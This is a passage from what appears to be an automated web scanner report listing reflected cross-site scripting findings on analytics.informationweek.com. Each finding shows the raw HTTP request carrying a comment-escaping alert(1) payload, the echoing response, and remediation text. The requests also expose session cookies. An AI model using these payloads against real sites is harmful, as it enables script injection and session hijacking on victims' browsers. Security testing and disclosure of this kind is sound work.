This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ontinuity.html75b36--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E06300418583&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583"> ...[SNIP]...
3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2e793--><script>alert(1)</script>2cc393b4e14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... y.html%3F2e793--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cc393b4e14%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9f503--><script>alert(1)</script>6ba192a2efa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6ba192a2efa%2F20%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2af97--><script>alert(1)</script>2b34991a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:15 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2b34991a0a3%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 49eb2--><script>alert(1)</script>3dbbea7fb8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-manag